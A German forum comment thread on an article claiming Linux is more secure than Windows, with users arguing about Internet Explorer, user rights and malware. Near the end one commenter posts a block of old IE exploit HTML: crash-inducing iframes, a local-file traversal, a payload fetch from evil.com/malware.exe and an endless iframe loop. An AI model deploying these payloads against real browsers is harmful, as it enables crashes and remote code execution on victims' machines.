News Linux sicherer als Windows

[Faustpfand]

Na, diese "Linux ist sicherer"-Geschichte ist aber auch schon älter als fließend Wasser...
Mal davon abgesehen, dass auch Linux einige -- wenn auch weniger -- Sicherheitslücken enthält.

Und die, die meinen, das falle nur nicht so auf, weil Linux weniger verbreitet ist: Quark! Gerade auf Servern sind Apache und andere Linux-Webserver auf den vorderen Rängen. Und wen interessieren schon die paar Daten einzelner User? Den Angreifern werden eher Server mit Kundendaten o.ä. als Ziel gelten. Das heißt also, dass viele Experten gerade dort auf der Suche nach Sicherheitslücken sind. Windows-Sicherheitslücken werden meist zur Panikmache bzw. Anti-Microsoft-Propaganda erforscht. Die Linux'sche Open-Source Community kann jedoch schneller reagieren, Microsoft braucht oft Wochen bis zur Schließung einer solchen Lücke.

Naja, Microsoft wird weiterhin der "böse" bleiben, solange die Mehrheit der HomePC- und Office-User deren Produkte verwenden. Für eine so teure Software könnte man allerdings in der Tat etwas mehr Sicherheit erwarten, wenn man bedenkt, dass Linux trotz Nulltarifs um doch einige Ecken sicherer ist.

 

[Rika]

@custus: Du hast den Text offenbar nicht verstanden... Linux, Mozilla etc. sind nicht deshalb sicherer, weil sie weniger verwendet werden, sondern weil sie einfach besser designt sind. Dieser Effekt war schon immer deutlicher als der Effekt durch die geringe Nutzung, aber einige wie z.B. du wollen das einfach nicht wahrnehmen.

@geryzens: Pech nur, daß LinuxWorld sogar Werbeanzeigen mit Windows Server 2003 schaltet...

 

[Throx]

hmm jemand unparteiischer soll das überprüfen, oh... warte, BSD User? nein das ist zu stark *nix, dann doch lieber nen apple user, ach logo was gibts da denn noch so, solaris?
Nimms mir nicht übel, aber es wird schwer sein, da unparteiische Leute zu finden, sobald man sich mit der Problematik auseinander setzt, nimmt man doch schon Partei an

 

[custus]

@Rika
Es geht nicht um das wahrhaben wollen. Um ehrlich zu sein, ist es mir sogar sch... egal, ob Linux nun sicherer ist, oder windows. Ein System ist im Endeffekt auch nur so sicher, wie der jeweilige Benutzer es einrichtet.
Ich habe halt meine Meinung dazu, die auf meinen eigenen Erfahren beruht.
Ich habe auch den Artikel gelesen nur zu gut, trotzdem hat er meine Meinung nicht geändert, das wirst du wohl akzeptieren müssen.

Ich programmiere nun schon zulange selber Software, als das ich nicht wüßte wie ein OpenSource Projekt und/oder Microsoft arbeitet. Ich stelle mir halt nur andere Fragen z.B. warum die Dialer-Programmierer keine für eine Linux-Oberfläche machen?
Warum sind Trojaner und Dialer, Hijacker so schnell auf Windows Rechner zu bringen?

Der Artikel macht es sich mit dem Mythos des weniger verbreiteten Systems relativ einfach, indem er plötzlich von einem Desktop-System auf Apache und IIS springt, aber nicht erklärt wo nun der Kern dieser Gerüchte liegt.

Und damit keine Missverständnisse aufkommen: Ich habe nie gesagt, dass der Artikel etwas falsches ausgesagt hätte.

P.S.: So nun habt ihr wieder Futter für die Kanonen.

 

[marcelcedric]

Ich stelle mir halt nur andere Fragen z.B. warum die Dialer-Programmierer keine für eine Linux-Oberfläche machen?
Warum sind Trojaner und Dialer, Hijacker so schnell auf Windows Rechner zu bringen?

Ganz einfach: Windows ist das meistverbreiteste Desktop System und daher wird fast nur fuer dieses OS sowas gecodet. Sehen wir das mal von der "Wirtschaftlichen Lage. Wuerdest du einen Dialer fuer ein OS programmieren was vielleicht von nur 10% auf dem Desktop Pc verwendet wird? NEIN, weil es kein Geld bringt.


mfg

 

[Rika]

@custus:

>Ein System ist im Endeffekt auch nur so sicher, wie der jeweilige Benutzer es einrichtet.

Den IE kann man nicht deinstallieren. Man kann ihn nicht mal so einstellen, daß er nicht mehr anfällig gegen bekannte sicherheitskritische Fehler ist. Und kaum ein Benutzer kann Windows en totale so einrichten, daß es nur vergleichbar sicher wie ein benutzerfreundlichen Linux ist.

> warum die Dialer-Programmierer keine für eine Linux-Oberfläche machen?
man Benutzerrechte

>Warum sind Trojaner und Dialer, Hijacker so schnell auf Windows Rechner zu bringen?
man User=Administrator=root

> aber nicht erklärt wo nun der Kern dieser Gerüchte liegt.
In Idiotie und Stolz und falschverstandenen Statistiken/Analysen. In der Realität jedenfalls nicht, denn man muss kein Fachmann sein um einzusehen daß z.B. der IE konzeptionell kaputt ist.

 

[BSDDaemon]

@Experten die meinen das Viren und Würmer nur für Windows gemacht werden weil es nur dort profitabel ist.

Die letzten Viren und Würmer hatten absolut 0.00% finanzelle Interessen und sollten auch in keinem Fall eine Basis dafür sein. Es ist ein kleiner 'Krieg' zwischen den Autoren und welche Plattform kann man leichter plätten als jede andere.... w32. Alleine schon wegen der schnellen und oft fatalen Reg Änderungen. Windows ist egal wie sicher es der Anwender machen will ein sehr anfälliges Scheunentor was die Meldungen immer und immer wieder zeigen. Und das schlimme ist das sich diese Basis von Windows von 2000 was es als Desktop und Server gab über XP hin zu 2003 und auch weiter zu Longhorn zieht. Ein löchrige Basis die auch die nächsten Jahre ein perfektes Ziel sein wird weil es dort am leichtesten ist einzudringen. Bei Windows kann man nicht eben einen Stable Kernel 2.4 nehmen der extrem ausgereift und geprüft ist, da muss man das nehmen was es gibt und damit neue Lücken in Kauf nehmen oder alte Sachen nutzen und Inkompatibilität in Kauf nehmen. Eine identische Basis für Desktops und Server, der Schwachsinn überhaupt. Da muss man sich nicht wundern.

 

[value]

@custus:

>Ein System ist im Endeffekt auch nur so sicher, wie der jeweilige Benutzer es einrichtet.

Den IE kann man nicht deinstallieren. Man kann ihn nicht mal so einstellen, daß er nicht mehr anfällig gegen bekannte sicherheitskritische Fehler ist. Und kaum ein Benutzer kann Windows en totale so einrichten, daß es nur vergleichbar sicher wie ein benutzerfreundlichen Linux ist.

Man kann den IE sehr wohl so sicher machen, das so gut wie keine Lücken übrig bleiben.
Zb die Std. Konfiguration wenn Windows Server 2003 installiert wird, oder auch der
Heise Browsercheck helfen.

Allerdings ist der IE dann auch nicht mehr benutzbar, da die Internetzone komplett "tot" ist, und nur noch Seiten in anderen Zonen dargestellt werden.

 

[marcelcedric]

@Experten die meinen das Viren und Würmer nur für Windows gemacht werden weil es nur dort profitabel ist.

Die letzten Viren und Würmer hatten absolut 0.00% finanzelle Interessen und sollten auch in keinem Fall eine Basis dafür sein. Es ist ein kleiner 'Krieg' zwischen den Autoren und welche Plattform kann man leichter plätten als jede andere.... w32. Alleine schon wegen der schnellen und oft fatalen Reg Änderungen. Windows ist egal wie sicher es der Anwender machen will ein sehr anfälliges Scheunentor was die Meldungen immer und immer wieder zeigen. Und das schlimme ist das sich diese Basis von Windows von 2000 was es als Desktop und Server gab über XP hin zu 2003 und auch weiter zu Longhorn zieht. Ein löchrige Basis die auch die nächsten Jahre ein perfektes Ziel sein wird weil es dort am leichtesten ist einzudringen. Bei Windows kann man nicht eben einen Stable Kernel 2.4 nehmen der extrem ausgereift und geprüft ist, da muss man das nehmen was es gibt und damit neue Lücken in Kauf nehmen oder alte Sachen nutzen und Inkompatibilität in Kauf nehmen. Eine identische Basis für Desktops und Server, der Schwachsinn überhaupt. Da muss man sich nicht wundern.

Ich hoffe, du meinst mit deinem Kommentar gegenueber den Experten nicht mich, da ich keinerlei Worte darueber fallen gelassen habe, sondern nur zu den Dialern und DAS ist zu 100% richtig.

mfg

 

[fettes Schaf]

hab ent alle comments gelesen,a ber ihr solltet mal euch überlegn welchem prog ihr mehr traut: eins das von programmierern einer firma geschrieben wurde, oder einem an dem theoretisch JEDER rumfummeln kann. also ich würd da aufpassen
lninux ist deswegen sicherer weil sich weniger für linux intressieren (die virenersteller) und wegen den angesprochenen root rechten, welche allerdings JEDER winuser auch machen kann.
ich erinnere mich jedoch dass es mal ne studie gab die grad das gegenteil sagte. na was ne überraschung, einer von lniuxworld sagt linux is besser, eine von ms gesponserte studie sagt win ist besser.
also, wer sich auf solche studien beschränkt ist wohl selbst beschhränkt. denn die größte Sicherheitslücke IST und BLEIBT der Mensch. daher sollte die entscheidung ob win oder linux nicht auf der sicherheitsebene ausgetragen werden

 

[karuso]

hab ent alle comments gelesen,a ber ihr solltet mal euch überlegn welchem prog ihr mehr traut: eins das von programmierern einer firma geschrieben wurde, oder einem an dem theoretisch JEDER rumfummeln kann. also ich würd da aufpassen
lninux ist deswegen sicherer weil sich weniger für linux intressieren (die virenersteller) und wegen den angesprochenen root rechten, welche allerdings JEDER winuser auch machen kann.
ich erinnere mich jedoch dass es mal ne studie gab die grad das gegenteil sagte. na was ne überraschung, einer von lniuxworld sagt linux is besser, eine von ms gesponserte studie sagt win ist besser.
also, wer sich auf solche studien beschränkt ist wohl selbst beschhränkt. denn die größte Sicherheitslücke IST und BLEIBT der Mensch. daher sollte die entscheidung ob win oder linux nicht auf der sicherheitsebene ausgetragen werden

wem würdest du mehr vertrauen? einer profitorientierten firma von der du nicht weisst was die in ihr programm schreiben oder einem projekt, das versucht das beste zu erstellen? an diesen projekten kann nicht einfach jeder mitarbeiten, da brauchste schon nen account. haben sogar nen test gemacht: von einem übersetzer den account bekommen und dann fehlerhaften code eingeschleußt: nach 2 stunden war es rückgängig gemacht...

 

[Rika]

@value: Schön wär's, denn es bleiben mindestens 5 kritische sowie zig weitere schlimme Lücken offen, zugleich wird der IE total unbedienbar. Nein danke, bei anderen Browsern kann ich JavaScript und Java eingeschaltet lassen, ohne mich vor irgendetwas fürchten zu müssen.

<--[if IE :-)]>
<iframe src="?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....">
<iframe src="#AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....">
<object data="?" TYPE="image/jpeg" width=1 height=1>
<object data="#" TYPE="image/jpeg" width=1 height=1>
<iframe src="file://\x43:\foo">
<img src="localexploit.html"><object data="ftp://%@/../../../../Local Settings/Temp/localexploit.html">
<style type="text/css">
.test {border: 1px solid black;}
.test p:first-letter {font-size: 2em;font-weight: bold;
float:left;border-bottom: 1px solid red;}
</style><div class="test"
style="visibility:hidden"><p><strong>Foo</strong>Bar</p></div>
<object data="http://www.evil.com/malware.exe" type="image/gif" name="foo">
<script>foo.focus(); document.execCommand("ShellExecute");</script>
<script>document.open; while (true){document.write('<iframe
src="?">');}</script>
Achtung, der IE ist ein Gefahr. Wirklich ;-)
<![endif]-->

ist noch vergleichsweise harmlos.

 

[Msp2601]

Heute auf heise.de

http://www.heise.de/newsticker/meldung/52592